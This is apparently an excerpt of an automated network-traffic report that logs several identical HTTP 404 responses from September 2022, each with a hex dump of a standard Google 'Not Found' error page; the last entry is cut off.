          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 